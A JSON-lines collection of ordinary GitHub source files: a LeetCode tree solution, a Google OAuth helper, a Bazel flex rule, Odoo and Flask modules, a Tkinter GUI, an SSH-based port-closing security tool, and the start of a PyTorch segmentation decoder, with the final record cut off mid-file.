+{"seq_id":"34085669870","text":"\n\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution:\n \"\"\"\n 题意是从右边看一棵树,返回你能看到的全部\n 递归实现,要考虑几种情况:\n 1.最左边左子树高于右子树,则要先返回最左边左子树\n 2.最右边右子树下的左子树高于右子树\n 3.右子树或者左子树刚好成一排\n 解法:先得到最右、最左子树,然后返回结果:root.val+右子树+多出的左子树\n Runtime: 36 ms, faster than 83.42% of Python3 online submissions for Binary Tree Right Side View.\n Memory Usage: 13.8 MB, less than 5.26% of Python3 online submissions for Binary Tree Right Side View.\n \"\"\"\n def rightSideView(self, root: TreeNode) -> List[int]:\n if not root:\n return []\n right = self.rightSideView(root.right)\n left = self.rightSideView(root.left)\n return [root.val] + right + left[len(right):]\n\n\nclass Solution2:\n \"\"\"\n DFS解法,可以说非常巧妙了,核心就在于depth == len(view)\n 通过这个条件牢牢把握上述的三种情况,当左子树低于最右边时,即不满足depth==len(view)\n 而每当遍历到的节点,depth高于当前的depth:即len(view),就添加到结果集,因为递归是从右到左,\n 所以肯定会从右到左的加入节点\n \"\"\"\n def rightSideView(self, root: TreeNode) -> List[int]:\n def collect(node, depth):\n if node:\n if depth == len(view):\n view.append(node.val)\n collect(node.right, depth+1)\n collect(node.left, depth+1)\n view = []\n collect(root, 0)\n return view","repo_name":"sandwu/leetcode_problems","sub_path":"8.tree/199. Binary Tree Right Side View.py","file_name":"199. Binary Tree Right Side View.py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"73792585190","text":"import json\r\nfrom requests_oauthlib import OAuth2Session\r\nfrom oauthlib.oauth2 import TokenExpiredError\r\nfrom oauthlib.oauth2.rfc6749.errors import MismatchingStateError\r\n\r\n\r\n\r\n\r\nclass GoogleLogin:\r\n\t# Client Session\r\n\tauthorization_url = None\r\n\tauth_client = None\r\n\ttoken = None\r\n\t# Config\r\n\tredirect_uri = \"https://localhost:8008/auth\"\r\n\tauthorization_base_url = \"https://accounts.google.com/o/oauth2/auth\"\r\n\ttoken_url = \"https://oauth2.googleapis.com/token\"\r\n\trefresh_url = token_url\r\n\tscope = [ \"https://www.googleapis.com/auth/userinfo.email\", \"https://www.googleapis.com/auth/userinfo.profile\", \"openid\", \"https://mail.google.com/\" ]\r\n\t# info url\r\n\tuser_info_uri = \"https://www.googleapis.com/oauth2/v1/userinfo\"\r\n\t# user data\r\n\r\n\tuser_info = None\r\n\r\n\tdef __init__(self, client_id, client_secret, redirect_uri=None, authorization_base_url=None, token_url=None, scope=None, refresh_url=None, token=None):\r\n\t\t\"\"\"\r\n\t\t\tInit the GoogleAuthClient\r\n\t\t\"\"\"\r\n\t\tself.client_id = client_id\r\n\t\tself.client_secret = client_secret\r\n\t\t# Check if parameter is provided\r\n\t\t# Set if parameter is provided\r\n\t\tif redirect_uri:\r\n\t\t\tself.redirect_uri = redirect_uri\r\n\t\tif authorization_base_url:\r\n\t\t\tself.authorization_base_url = authorization_base_url\r\n\t\tif token_url:\r\n\t\t\tself.token_url = token_url\r\n\t\tif scope:\r\n\t\t\tself.scope = scope\r\n\t\tif refresh_url != token_url:\r\n\t\t\tself.refresh_url = refresh_url\r\n\t\tif token:\r\n\t\t\tself.token = token\r\n\t\t# [ COMPLETE ]\r\n\r\n\tdef load_from_file(self, file_name):\r\n\t\t\"\"\"\r\n\t\t\tParse Google CLient Config.json\r\n\t\t\"\"\"\r\n\t\ttry:\r\n\t\t\tconfig_file = open(file_name, 'r').read()\r\n\r\n\t\t\tconfig_file = json.loads(config_file)[\"installed\"]\r\n\t\t\tself.client_id = config_file[\"client_id\"]\r\n\t\t\tself.client_secret = config_file[\"client_secret\"]\r\n\t\t\tself.authorization_base_url = config_file[\"auth_uri\"]\r\n\t\t\tself.token_url = config_file[\"token_uri\"]\r\n\t\t\tself.refresh_url = self.token_url\r\n\t\t\tself.redirect_uri = \"http://localhost\"\r\n\t\texcept Exception as e:\r\n\t\t\tprint(\"Error Occured when importing config file...\")\r\n\t\t\treturn False\r\n\t\treturn True\r\n\r\n\r\n\r\n\tdef create_auth_url(self, client_id=None):\r\n\t\t\"\"\"\r\n\t\t\tReturns Google Auth URL\r\n\t\t\"\"\"\r\n\t\tif client_id:\r\n\t\t\tself.client_id = client_id\r\n\t\tself.auth_client = OAuth2Session(self.client_id, scope=self.scope, redirect_uri=self.redirect_uri)\r\n\t\tauthorization_url, state = self.auth_client.authorization_url(self.authorization_base_url, access_type=\"offline\", prompt=\"select_account\")\r\n\t\treturn authorization_url\r\n\r\n\r\n\tdef create_token(self, redirect_response,client_secret=None, token_url=None):\r\n\t\t\"\"\"\r\n\t\t\tCreate email auth token\r\n\t\t\"\"\"\r\n\t\tif client_secret:\r\n\t\t\tself.client_secret = client_secret\r\n\t\tif token_url:\r\n\t\t\tself.token_url = token_url\r\n\t\t# \r\n\t\tif not self.token:\r\n\t\t\ttry:\r\n\t\t\t\tself.token = self.auth_client.fetch_token(self.token_url, client_secret=self.client_secret, authorization_response=redirect_response)\r\n\t\t\texcept MismatchingStateError:\r\n\t\t\t\tprint(\"The provided response uri does not coincide with the auth_uri.\\nPlease login with new auth_uri.\")\r\n\t\t\texcept Exception as e:\r\n\t\t\t\tprint(str(e))\r\n\t\t\t\tprint(\"Error Occured in Fetching 
token. Please Login Again\")\r\n\t\treturn self.token\r\n\r\n\r\n\tdef refresh_token(self, token=None, user_info_uri=None):\r\n\t\t\"\"\"\r\n\t\t\tRefresh Token\r\n\t\t\"\"\"\r\n\t\t# updated token is the previous token\r\n\t\t# in case the token expired, we refresh it\r\n\t\tif token:\r\n\t\t\tself.token = token\r\n\t\tif user_info_uri:\r\n\t\t\tself.user_info_uri = user_info_uri\r\n\t\tupdated_token = self.token\r\n\t\ttry:\r\n\t\t\tupdate_client = OAuth2Session(self.client_id, token=updated_token)\r\n\t\t\tauth_client.get(self.user_info_uri)\r\n\t\texcept TokenExpiredError as e:\r\n\t\t\ttry:\r\n\t\t\t\tupdated_token = self.auth_client.refresh_token(self.refresh_url)\r\n\t\t\t\tself.token = updated_token\r\n\t\t\texcept:\r\n\t\t\t\tprint(\"Error Occured While refreshing token... Please Try Again.\")\r\n\t\t# Return updated_token\r\n\t\treturn updated_token\r\n\r\n\r\n\tdef get_user_info(self):\r\n\t\t\"\"\"\r\n\t\t\tReturns userdata as json\r\n\t\t\"\"\"\r\n\t\tif not self.user_info:\r\n\t\t\ttry:\r\n\t\t\t\tr = self.auth_client.get('https://www.googleapis.com/oauth2/v1/userinfo')\r\n\t\t\t\tself.user_info = r.json()\r\n\t\t\texcept:\r\n\t\t\t\tprint(\"Error Getting User info\")\r\n\t\treturn self.user_info\r\n\r\n\r\n\r\n\tdef get_user_email(self):\r\n\t\t\"\"\"\r\n\t\t\tReturns user email\r\n\t\t\"\"\"\r\n\t\tuser_email = None\r\n\t\tif not self.user_info:\r\n\t\t\ttry:\r\n\t\t\t\tr = self.auth_client.get('https://www.googleapis.com/oauth2/v1/userinfo')\r\n\t\t\t\tself.user_info = r.json()\r\n\t\t\texcept:\r\n\t\t\t\tprint(\"Error Getting User info\")\r\n\t\t# Return user email\r\n\t\ttry:\r\n\t\t\tuser_email = self.user_info['email']\r\n\t\t\tprint(\"User Email Found: \" + user_email)\r\n\t\texcept:\r\n\t\t\tprint(\"Unable to parse user info\")\r\n\t\treturn user_email","repo_name":"CypherpunkSamurai/Gmail-Cleaner","sub_path":"login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":4617,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
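A hypothetical end-to-end use of the class above for an installed-app flow (the client id and secret are placeholders; the user pastes the URL they were redirected to after authorizing):

```python
login = GoogleLogin('my-client-id', 'my-client-secret')
print('Visit this URL and authorize:', login.create_auth_url())

redirect_response = input('Paste the full redirect URL here: ')
token = login.create_token(redirect_response)
if token:
    print('Logged in as:', login.get_user_email())
```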
+{"seq_id":"70349124390","text":"def _genlex_impl(ctx):\n \"\"\"Implementation for genlex rule.\"\"\"\n\n # Compute the prefix, if not specified.\n if ctx.attr.prefix:\n prefix = ctx.attr.prefix\n else:\n prefix = ctx.file.src.basename.partition(\".\")[0]\n\n # Construct the arguments.\n args = ctx.actions.args()\n args.add(\"-o\", ctx.outputs.out)\n args.add(\"-P\", prefix)\n args.add_all(ctx.attr.lexopts)\n args.add(ctx.file.src)\n outputs = [ctx.outputs.out]\n ctx.actions.run(\n executable = ctx.executable._flex,\n arguments = [args],\n inputs = ctx.files.src + ctx.files.includes,\n outputs = outputs,\n mnemonic = \"Flex\",\n progress_message = \"Generating %s from %s\" % (\n ctx.outputs.out.short_path,\n ctx.file.src.short_path,\n ),\n )\n return [\n DefaultInfo(files = depset(direct = outputs)),\n ]\n\nflex = rule(\n _genlex_impl,\n attrs = {\n \"src\": attr.label(\n mandatory = True,\n allow_single_file = [\n \".l\",\n \".ll\",\n \".lex\",\n \".lpp\",\n ],\n doc = \"The .lex source file for this rule\",\n ),\n \"includes\": attr.label_list(\n allow_files = True,\n doc = \"A list of headers that are included by the .lex file\",\n ),\n \"out\": attr.output(\n mandatory = True,\n doc = \"The generated source file\",\n ),\n \"prefix\": attr.string(\n doc = \"External symbol prefix for Flex. This string is \" +\n \"passed to flex as the -P option, causing the resulting C \" +\n \"file to define external functions named 'prefix'text, \" +\n \"'prefix'in, etc. The default is the basename of the source\" +\n \"file without the .lex extension.\",\n ),\n \"lexopts\": attr.string_list(\n doc = \"A list of options to be added to the flex command line.\",\n ),\n \"_flex\": attr.label(\n default = Label(\"@flex//:flex_bin\"),\n executable = True,\n cfg = \"host\",\n ),\n },\n provides = [\n DefaultInfo,\n ],\n)\n","repo_name":"fuhailin/rules_deps","sub_path":"third_party/flex/flex.bzl","file_name":"flex.bzl","file_ext":"bzl","file_size_in_byte":2188,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"}
+{"seq_id":"33881907565","text":"from odoo import api, fields, models\n\n\nclass Board(models.AbstractModel):\n _name = 'board.board'\n _description = \"Board\"\n _auto = False\n\n # This is necessary for when the web client opens a dashboard. Technically\n # speaking, the dashboard is a form view, and opening it makes the client\n # initialize a dummy record by invoking onchange(). And the latter requires\n # an 'id' field to work properly...\n id = fields.Id()\n\n @api.model_create_multi\n def create(self, vals_list):\n return self\n\n @api.model\n def get_view(self, view_id=None, view_type='form', **options):\n \"\"\"\n Overrides orm field_view_get.\n @return: Dictionary of Fields, arch and toolbar.\n \"\"\"\n\n res = super().get_view(view_id, view_type, **options)\n\n custom_view = self.env['ir.ui.view.custom'].sudo().search([('user_id', '=', self.env.uid), ('ref_id', '=', view_id)], limit=1)\n if custom_view:\n res.update({'custom_view_id': custom_view.id,\n 'arch': custom_view.arch})\n res['arch'] = self._arch_preprocessing(res['arch'])\n return res\n\n @api.model\n def _arch_preprocessing(self, arch):\n from lxml import etree\n\n def remove_unauthorized_children(node):\n for child in node.iterchildren():\n if child.tag == 'action' and child.get('invisible'):\n node.remove(child)\n else:\n remove_unauthorized_children(child)\n return node\n\n archnode = etree.fromstring(arch)\n # add the js_class 'board' on the fly to force the webclient to\n # instantiate a BoardView instead of FormView\n archnode.set('js_class', 'board')\n return etree.tostring(remove_unauthorized_children(archnode), pretty_print=True, encoding='unicode')\n","repo_name":"odoo/odoo","sub_path":"addons/board/models/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","stars":31745,"dataset":"github-code","pt":"71"}
+{"seq_id":"20530229853","text":"import os\nfrom flask import Blueprint, jsonify, request\nfrom flask_login import login_required, current_user\nimport requests\nfrom .aws_s3 import upload_file_to_s3, get_unique_filename, ALLOWED_EXTENSIONS, remove_file_from_s3\n\nfrom app.models import db, Review, ReviewImage, Vote\n\nvote_routes = Blueprint('votes', __name__)\n\n# ------------------------ EDIT VOTE ------------------------\n@vote_routes.route('/', methods=['PUT'])\n@login_required\ndef edit_vote(vote_id):\n vote = Vote.query.get(vote_id)\n if not vote:\n return jsonify({'error': 'Vote not found'}), 404\n\n if vote.user_id != current_user.id:\n return jsonify({'error': 'You are not authorized to edit this vote'}), 403\n\n vote_type = request.json.get('vote_type')\n if vote_type not in [-1, 1]:\n return jsonify({'error': 'Invalid vote type. Vote type should be either 1 or -1'}), 400\n\n vote.vote_type = vote_type\n db.session.commit()\n\n return jsonify(vote.to_dict()), 200\n\n\n# ------------------------ DELETE VOTE ------------------------\n@vote_routes.route('/', methods=['DELETE'])\n@login_required\ndef delete_vote(vote_id):\n vote = Vote.query.get(vote_id)\n if not vote:\n return jsonify({'error': 'Vote not found'}), 404\n\n if vote.user_id != current_user.id:\n return jsonify({'error': 'You are not authorized to delete this vote'}), 403\n\n db.session.delete(vote)\n db.session.commit()\n\n return jsonify({'message': 'Vote deleted successfully'}), 200\n","repo_name":"sydneycendana/workshop","sub_path":"app/api/vote_routes.py","file_name":"vote_routes.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"15356391446","text":"inicio = int(input())\nfim = int(input())\nprimos = 0\nfor i in range(inicio, fim + 1):\n div = 0\n for j in range(1, i + 1):\n if i % j == 0:\n div += 1\n if div == 2:\n primos += 1\n print(i)\n\nprint(f'primos: {primos}')\n","repo_name":"juiasi/ProjetosFaculdade","sub_path":"lp_atividades/AC2/intervalo_primos.py","file_name":"intervalo_primos.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"32268919010","text":"import tkinter as tk\nimport utils\nfrom tkinter import ttk\nfrom tkinter.messagebox import showerror\n\n\nclass TrashApp(tk.Tk):\n def __init__(self, bridge_callback, bridge_on_close_window_callback):\n super().__init__()\n self.bridge_callback = bridge_callback\n self.actual_trash = 0\n self.trash_capacity = 0\n self.is_trash_locked = False\n self.bridge_on_close_window_callback = bridge_on_close_window_callback\n\n # Close window event\n self.protocol('WM_DELETE_WINDOW', self._close_button)\n\n # Set main attributes\n self.title('Lixeira')\n self.geometry('600x400+50+50')\n self.resizable(False, False)\n\n # Entry\n self.entrythingy = tk.Entry()\n self.entrythingy.pack()\n\n # Labels\n self.trash_capacity_label = ttk.Label(self, text='Capacidade máxima de lixo: 0')\n self.trash_capacity_label.pack(ipadx=10, ipady=10)\n self.actual_trash_label = ttk.Label(self, text='Quantidade de lixo atual: 0')\n self.actual_trash_label.pack(ipadx=10, ipady=10)\n\n # Buttons\n self.put_trash_button = ttk.Button(self, text='Adicionar lixo', command=self._put_trash_button_callback)\n self.put_trash_button.pack(ipadx=5, ipady=5, expand=False)\n self.clear_trash_button = ttk.Button(self, text='Esvaziar lixeira', command=self.clear_trash_button_callback)\n self.clear_trash_button.pack(ipadx=5, ipady=5, expand=False)\n self.lock_trash_button = ttk.Button(self, text='Travar lixeira', command=self.lock_trash_button_callback)\n self.lock_trash_button.pack(ipadx=5, ipady=5, expand=False)\n\n # String Variable\n self.trash_capacity_stringVar = tk.StringVar()\n self.trash_capacity_stringVar.set(\"0\")\n self.entrythingy[\"textvariable\"] = self.trash_capacity_stringVar\n\n # Binds\n self.entrythingy.bind('', self._set_trash_capacity)\n\n def _close_button(self):\n self.bridge_on_close_window_callback()\n self.destroy()\n\n def _set_trash_capacity(self, event):\n if self._is_capacity_valid():\n self.trash_capacity = int(self.trash_capacity_stringVar.get())\n self.trash_capacity_label['text'] = 'Capacidade máxima de lixo: ' + str(self.trash_capacity)\n self._bridge_callback()\n\n def _is_capacity_valid(self):\n if not utils.is_int(self.trash_capacity_stringVar.get()):\n showerror('Erro', 'A capacidade digitada deve ser um número inteiro')\n return False\n capacity_typed = int(self.trash_capacity_stringVar.get())\n if capacity_typed < 0:\n showerror('Erro', 'A capacidade máxima da lixeira que foi digitada não pode ser menor que zero')\n return False\n if capacity_typed < self.actual_trash:\n showerror('Erro', 'A capacidade máxima da lixeira que foi digitada é menor que a quantidade de lixo atual')\n return False\n return True\n\n def _put_trash_button_callback(self):\n if self._is_possible_to_put_more_trash():\n self.actual_trash += 1\n self._change_actual_trash_label()\n self._bridge_callback()\n if self._should_auto_lock_trash():\n self.lock_trash_button_callback()\n\n def clear_trash_button_callback(self):\n self.actual_trash = 0\n self._change_actual_trash_label()\n self._bridge_callback()\n\n def _should_auto_lock_trash(self):\n if self.trash_capacity != 0 and self.trash_capacity == self.actual_trash:\n return True\n return False\n\n def _change_actual_trash_label(self):\n self.actual_trash_label['text'] = 'Quantidade de lixo atual: ' + str(self.actual_trash)\n\n def _is_possible_to_put_more_trash(self):\n if self.trash_capacity > self.actual_trash:\n return True\n return False\n\n def _bridge_callback(self):\n self.bridge_callback(self.trash_capacity, self.actual_trash, 
self.is_trash_locked)\n\n def lock_trash_button_callback(self):\n self.put_trash_button.state(['disabled'])\n self.lock_trash_button.state(['disabled'])\n self.is_trash_locked = True\n self._bridge_callback()\n\n def unlock_trash(self):\n self.put_trash_button.state(['!disabled'])\n self.lock_trash_button.state(['!disabled'])\n self.is_trash_locked = False\n self._bridge_callback()\n","repo_name":"TomasCartman/redes_01","sub_path":"client_folder/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":4431,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"27549884469","text":"import string\n\nimport constants\nfrom handler.DatabaseHandler import DatabaseHandler\nfrom handler.NmapHandler import NmapHandler\nfrom handler.ssh.SshHandler import SshHandler\n\n\n# Class responsible for solving ip security issues.\nclass IpIssueSolver:\n def __init__(self, configuration):\n self.configuration = configuration\n self.database_handler = DatabaseHandler(constants.MONGO_URI)\n\n # Fix implementation if too many ports are open a given host.\n def fix_too_many_open_ports(self, ip: string):\n # get ssh information of last nmap scan from database\n nmap_handler = NmapHandler()\n ssh_information = nmap_handler.get_ssh_information_by_ip(ip)\n\n # get latest nmap scan from database\n nmap_report_db = self.database_handler.select_latest_entry(constants.COLLECTION_NAME_NMAPRUN)\n host_information = nmap_handler.get_host(nmap_report_db['nmaprun'], ip)\n\n if host_information is None:\n return 'Host not found!'\n\n # connect to host with ssh\n ssh_handler = SshHandler(ssh_information.ip, ssh_information.port,\n constants.SSH_USER, constants.SSH_PASSWORD)\n ssh_handler.connect()\n\n # read allow/listed ports\n allow_list_ports = self.configuration['allow_list_port']\n allow_list_ports = allow_list_ports.split('\\n')\n # remove useless spaces\n allow_list_ports = [port.strip() for port in allow_list_ports]\n\n # add current ssh port otherwise connection will be cut off\n allow_list_ports.append(str(ssh_information.port))\n\n # kill all ports/application which are not in the allow-list\n killed_ports = []\n for port in host_information.ports:\n if (port['@protocol'] == 'tcp') and (not port['@portid'] in allow_list_ports):\n output = ssh_handler.execute_command('sudo fuser -k ' + str(port['@portid']) + '/tcp')\n if output:\n killed_ports.append(output[0].split('/')[0])\n\n ssh_handler.disconnect()\n\n # return status\n if killed_ports:\n return 'Successfully killed ports ' + str(killed_ports) + ' on host ' + str(ip) + '!'\n else:\n return 'No ports killed!'\n","repo_name":"Ric1234567/DigitalTwinsForIoTSecurityManagement","sub_path":"flask-backend/analysis/ip/IpIssueSolver.py","file_name":"IpIssueSolver.py","file_ext":"py","file_size_in_byte":2254,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"13368408801","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom timm.models.layers import DropPath\nimport timm\nimport math\n\n\nclass ConvBNReLU(nn.Sequential):\n def __init__(self, in_channels, out_channels, kernel_size=3, dilation=1, stride=1, norm_layer=nn.BatchNorm2d,\n bias=False):\n super(ConvBNReLU, self).__init__(\n nn.Conv2d(in_channels, out_channels, kernel_size=kernel_size, bias=bias, dilation=dilation, stride=stride,\n padding=((stride - 1) + dilation * (kernel_size - 1)) // 2),\n norm_layer(out_channels),\n nn.ReLU6()\n )\n\n\nclass ConvBN(nn.Sequential):\n def __init__(self, in_channels, out_channels, kernel_size=3, dilation=1, stride=1, norm_layer=nn.BatchNorm2d,\n bias=False):\n super(ConvBN, self).__init__(\n nn.Conv2d(in_channels, out_channels, kernel_size=kernel_size, bias=bias, dilation=dilation, stride=stride,\n padding=((stride - 1) + dilation * (kernel_size - 1)) // 2),\n norm_layer(out_channels),\n )\n\n\nclass Conv(nn.Sequential):\n def __init__(self, in_channels, out_channels, kernel_size=3, dilation=1, stride=1, bias=False):\n super(Conv, self).__init__(\n nn.Conv2d(in_channels, out_channels, kernel_size=kernel_size, bias=bias, dilation=dilation, stride=stride,\n padding=((stride - 1) + dilation * (kernel_size - 1)) // 2)\n )\n\n\nclass SeparableConvBNReLU(nn.Sequential):\n def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, dilation=1, norm_layer=nn.BatchNorm2d):\n super(SeparableConvBNReLU, self).__init__(\n nn.Conv2d(in_channels, in_channels, kernel_size, stride=stride, dilation=dilation,\n padding=((stride - 1) + dilation * (kernel_size - 1)) // 2, groups=in_channels,\n bias=False),\n norm_layer(out_channels),\n nn.Conv2d(in_channels, out_channels, kernel_size=1, bias=False),\n nn.ReLU6(),\n )\n\n\nclass SeparableConvBN(nn.Sequential):\n def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, dilation=1, norm_layer=nn.BatchNorm2d):\n super(SeparableConvBN, self).__init__(\n nn.Conv2d(in_channels, in_channels, kernel_size, stride=stride, dilation=dilation,\n padding=((stride - 1) + dilation * (kernel_size - 1)) // 2, groups=in_channels,\n bias=False),\n norm_layer(out_channels),\n nn.Conv2d(in_channels, out_channels, kernel_size=1, bias=False),\n )\n\n\nclass SeparableConv(nn.Sequential):\n def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, dilation=1):\n super(SeparableConv, self).__init__(\n nn.Conv2d(in_channels, in_channels, kernel_size, stride=stride, dilation=dilation,\n padding=((stride - 1) + dilation * (kernel_size - 1)) // 2, groups=in_channels,\n bias=False),\n nn.Conv2d(in_channels, out_channels, kernel_size=1, bias=False)\n )\n\n\nclass Mlp(nn.Module):\n def __init__(self, in_features, hidden_features=None, out_features=None, act_layer=nn.ReLU6, drop=0.0):\n super(Mlp, self).__init__()\n out_features = out_features or in_features\n hidden_features = hidden_features or in_features\n self.fc1 = nn.Conv2d(in_features, hidden_features, 1, 1, 0, bias=True)\n self.act = act_layer()\n self.fc2 = nn.Conv2d(hidden_features, out_features, 1, 1, 0, bias=True)\n self.drop = nn.Dropout(drop, inplace=True)\n\n def forward(self, x):\n x = self.fc1(x)\n x = self.act(x)\n x = self.drop(x)\n x = self.fc2(x)\n x = self.drop(x)\n return x\n\n\nclass MCAM(nn.Module):\n def __init__(self, decode_channel, class_channel):\n super(MCAM, self).__init__()\n self.avg_pool = nn.AdaptiveAvgPool2d(1)\n self.max_pool = nn.AdaptiveMaxPool2d(1)\n b = 1\n gamma = 2\n t = 
int(abs((math.log(decode_channel, 2) + b) / gamma))\n        k = t if t % 2 else t + 1\n        r = math.log(k - 1, 2)\n        k1 = int(2 ** r + 1)\n        k2 = int(2 ** (r + 1) + 1)\n        k3 = int(2 ** (r + 2) + 1)\n        k4 = int(2 ** (r + 3) + 1)\n        self.conv0 = nn.Conv1d(1, 1, kernel_size=k1, padding=(k1 - 1) // 2)\n        self.conv1 = nn.Conv1d(1, 1, kernel_size=k2, padding=(k2 - 1) // 2)\n        self.conv2 = nn.Conv1d(1, 1, kernel_size=k3, padding=(k3 - 1) // 2)\n        self.conv3 = nn.Conv1d(1, 1, kernel_size=k4, padding=(k4 - 1) // 2)\n        self.sigmoid = nn.Sigmoid()\n        self.cSE = nn.Sequential(nn.Conv2d(decode_channel, decode_channel // 4, 1),\n                                 nn.ReLU(inplace=True), nn.Conv2d(decode_channel // 4, class_channel, 1), nn.Sigmoid())\n        self.conv = nn.Conv1d(1, 1, kernel_size=3, padding=1)\n        self.fc = nn.Linear(8 * decode_channel, decode_channel)\n        self.fc1 = nn.Sequential(ConvBN(decode_channel, class_channel, kernel_size=1), nn.Softmax(dim=1))\n\n    def forward(self, x):\n        y = self.avg_pool(x).squeeze(-1).transpose(1, 2)\n        ym = self.max_pool(x).squeeze(-1).transpose(1, 2)\n        y0 = self.conv0(y).transpose(1, 2).unsqueeze(-1)\n        y1 = self.conv1(y).transpose(1, 2).unsqueeze(-1)\n        y2 = self.conv2(y).transpose(1, 2).unsqueeze(-1)\n        y3 = self.conv3(y).transpose(1, 2).unsqueeze(-1)\n        ym0 = self.conv0(ym).transpose(1, 2).unsqueeze(-1)\n        ym1 = self.conv1(ym).transpose(1, 2).unsqueeze(-1)\n        ym2 = self.conv2(ym).transpose(1, 2).unsqueeze(-1)\n        ym3 = self.conv3(ym).transpose(1, 2).unsqueeze(-1)\n        y_full = torch.cat([y0, y1, y2, y3, ym0, ym1, ym2, ym3], dim=1).squeeze(-1).transpose(1, 2)\n        y = self.fc(self.conv(y_full).transpose(1, 2).squeeze(-1))\n        y = self.sigmoid(y).unsqueeze(-1).unsqueeze(-1)\n        y1 = self.cSE(y)\n        class_feat = self.fc1(y).squeeze(-1) + y1.squeeze(-1)\n        class_matrix = torch.bmm(y.squeeze(3), class_feat.transpose(2, 1)).unsqueeze(3)\n        class_matrix = nn.functional.softmax(class_matrix, dim=1)\n        class_matrix = nn.functional.softmax(class_matrix, dim=2)\n        return class_matrix\n\n\nclass MSAM(nn.Module):\n    def __init__(self, decode_channel, size):\n        super(MSAM, self).__init__()\n        self.h_pools = nn.AvgPool2d(kernel_size=(size, 1))\n        self.w_pools = nn.AvgPool2d(kernel_size=(1, size))\n        self.conv = ConvBNReLU(decode_channel, decode_channel, kernel_size=3)\n        self.bn = nn.BatchNorm2d(decode_channel)\n        self.relu = nn.ReLU(inplace=True)\n\n    def forward(self, x):\n        x_m = x\n        b, c, h, w = x_m.shape\n        x_h = self.h_pools(x_m).view(b * c, 1, w)\n        x_w = self.w_pools(x_m).view(b * c, h, 1)\n        qk = torch.bmm(x_w, x_h).view(b, c, h * w)\n        v = self.conv(x_m.view(b, c, h, w) * nn.functional.softmax(qk, -1).view(b, c, h, w) + x_m)\n        return v\n\n\nclass CIAFM(nn.Module):\n    def __init__(self, in_channels, key_channels, out_channels, dropout_rate=0.0):\n        super(CIAFM, self).__init__()\n        self.in_channels = in_channels\n        self.key_channels = key_channels\n        self.f_query = ConvBNReLU(in_channels, key_channels, kernel_size=3, stride=1)\n        self.f_key = ConvBNReLU(in_channels, key_channels, kernel_size=1)\n        self.f_value = ConvBNReLU(in_channels, key_channels, kernel_size=1)\n        self.f_up = ConvBNReLU(key_channels, in_channels, kernel_size=1)\n        self.fuse = ConvBNReLU(in_channels, in_channels, kernel_size=3, stride=1)\n        self.conv3x3 = nn.Sequential(ConvBNReLU(in_channels, out_channels, 3, 1))\n        self.conv1x1 = nn.Sequential(\n            ConvBNReLU(2 * in_channels, out_channels, 1), nn.Dropout2d(dropout_rate)\n        )\n\n    def forward(self, x, proxy):\n        x_shape = x.shape\n        query = self.f_query(x)\n        query = torch.reshape(query, (x_shape[0], 
self.key_channels, -1))\n query = query.transpose(1, 2)\n key = self.f_key(proxy)\n key = torch.reshape(key, (x_shape[0], self.key_channels, -1))\n value = self.f_value(proxy)\n value = torch.reshape(value, (x_shape[0], self.key_channels, -1))\n value = value.transpose(1, 2)\n min_map = torch.matmul(query, key)\n min_map = (self.key_channels ** -0.5) * min_map\n min_map = nn.Softmax(dim=1)(min_map)\n context = torch.matmul(min_map, value)\n context = context.transpose(2, 1)\n context = torch.reshape(\n context, (x_shape[0], self.key_channels, x_shape[2], x_shape[3])\n )\n context = self.f_up(context)\n context = self.fuse(context + x)\n space_pixels = self.conv3x3(x)\n out_feats = torch.cat([context, space_pixels], dim=1)\n out_feats = self.conv1x1(out_feats)\n return out_feats\n\n\nclass Attention(nn.Module):\n def __init__(self, dim, num_classes, size, dropout_rate=0.2):\n super(Attention, self).__init__()\n self.channel_attn = MCAM(dim, num_classes)\n self.space_attn = MSAM(dim, size)\n self.af = CIAFM(dim, dim // 2, dim, dropout_rate)\n\n def forward(self, x, skip):\n x = skip + x\n c_attn = self.channel_attn(x)\n s_attn = self.space_attn(x)\n out = self.af(s_attn, c_attn)\n return out\n\n\nclass Block(nn.Module):\n def __init__(self, dim, classes_dim, size, mlp_ratio=4.0, drop=0.2, upSample=False, drop_path=0.0,\n act_layer=nn.ReLU6, norm_layer=nn.BatchNorm2d):\n super(Block, self).__init__()\n self.norm1 = norm_layer(dim)\n self.attn = Attention(dim, num_classes=classes_dim, size=size, dropout_rate=drop)\n self.drop_path = DropPath(drop_path) if drop_path > 0.0 else nn.Identity()\n mlp_hidden_dim = int(dim * mlp_ratio)\n self.mlp = Mlp(in_features=dim, hidden_features=mlp_hidden_dim, out_features=dim, act_layer=act_layer,\n drop=drop)\n self.norm2 = norm_layer(dim)\n self.upSample = upSample\n if self.upSample:\n self.conv = ConvBNReLU(dim, dim, kernel_size=3)\n\n def forward(self, x, skip):\n x = x + self.drop_path(self.attn(self.norm1(x), self.norm1(skip)))\n out = x + self.drop_path(self.mlp(self.norm2(x)))\n if self.upSample:\n out = F.interpolate(x, scale_factor=2, mode=\"bilinear\", align_corners=True)\n out = self.conv(out)\n return out\n\n\nclass Decoder(nn.Module):\n def __init__(self, encoder_channels, decoder_channels, num_classes, size=(128, 64, 32, 16), dropout_rate=0.1):\n super(Decoder, self).__init__()\n\n self.conv1 = ConvBN(encoder_channels[0], decoder_channels, kernel_size=3)\n self.conv2 = ConvBN(encoder_channels[1], decoder_channels, 